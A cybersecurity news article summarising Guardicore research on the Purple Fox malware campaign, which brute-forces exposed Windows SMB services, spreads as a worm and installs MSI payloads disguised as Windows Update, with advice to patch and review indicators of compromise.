tampatra - stock.adobe.com

Brute-Force Campaign on Windows SMBs Spreads Worming Malware

Hackers are performing brute-force attacks on vulnerable, internet-facing Windows SMBs to deliver Purple Fox malware. The variant has been updated with worming capabilities.

Internet-facing Windows devices are being targeted by an active malware campaign known as Purple Fox. Hackers are leveraging brute-force attempts against SMBs to deploy the malware, which has worming capabilities, according to a Tuesday report from Guardicore.

Guardicore has detected a steady increase in malicious activity around Purple Fox, since the researchers began tracking the activity in May 2020. During that time, there has been a 600 percent increase, or about 90,000 observed attacks.

First discovered in March 2018, Purple Fox was previously deployed as an exploit kit that targeted Internet Explorer and Windows devices through a variety of privilege escalation exploits.

The earlier campaigns required interaction from the user or a third-party tool to deploy Purple Fox. But Guardicore researchers stressed that the latest campaign, launched at the end of 2020, shows the hackers behind the malware have boosted their deployment techniques.

Purple Fox is now able to spread through indiscriminate port scanning and active exploitation of exposed SMB services, such as those with weak hashes or passwords.

“While it appears that the functionality of Purple Fox hasn’t changed much post exploitation, its spreading and distribution methods – and its worm-like behavior – are much different than describe in previous [reports],” researchers wrote.

“We’ve observed an infrastructure that appears to be be made out of a hodge-podge of vulnerable an exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns,” they added.

Specifically, researchers detected the hackers hosting various MSI packages on 2,000 servers that appear to be compromised machines they’ve repurposed for hosting malicious payloads.

It also appears the vast majority of these servers are operating relatively old versions of Windows Server with the IIS version 7.5 and Microsoft FTP -- known to have multiple, severe vulnerabilities. The hackers are using these servers to deliver the initial payload.

About 52 percent of the observed servers used for service distribution are Microsoft Windows RPC, followed by Microsoft Terminal Service (16.5 percent) and Microsoft IIS httpd 7.5 (15.9 percent).

Guardicore was also able to assess how the hackers are spreading this campaign. The worm payload is executed after the compromise of a victim’s machine via an exposed, vulnerable service. The worm payload is also sent via a phishing campaign that exploits a browser vulnerability.

The hackers are leveraging multiple sample types to deploy the malware. After the virus deploys, it creates a new service able to establish persistence on the device and execute a simple command “for loop,” the purpose of which is to iterate across a number of URLs that contain the MSI that installs the final Purple Fox payload.

Once the package is executed, the MSI installed launches.

“The installer pretends to be a Windows Update package along with Chinese text which roughly translates to ‘Windows Update’ and random letters,” researchers explained. “These letters are randomly generated between each different MSI installer to create a different hash and make it a bit difficult to tie between different versions of the same MSI.” 

“This is a ‘cheap’ and simple way of evading various detection methods such as static signatures,” they continued. “We have [also] identified MSI packages with the same strings but with random null bytes appended to them in order to create different hashes of the same file.”

The installer then extracts the payloads and decrypts them from the MSI package. Concernedly, the malware is able to modify the Windows firewall: it adds a new policy able to create a new filter that blocks vulnerable, internet-facing ports from connecting to the infected device.

Guardicore believes that the attackers are leveraging this tool to prevent the machine from being reinfected and or to prevent another attacker from exploiting the same device. Enterprises should review provided indicators of compromise to assess their systems' security.

Purple Fox is the latest malware to tack on worming capabilities. Earlier this month, CERT-FR reported the Ryuk ransomware variant had been updated with worming capabilities that allow it to automatically proliferate across the network of its victims.

Worming capabilities add an extra layer of risk for entities that fail to patch known vulnerabilities or to segment vulnerable devices from the main network. It’s crucial for healthcare organizations, known for patch management struggles, to review the IOCs provided to determine if they’ve been compromised.

Next Steps

Dig Deeper on Cybersecurity strategies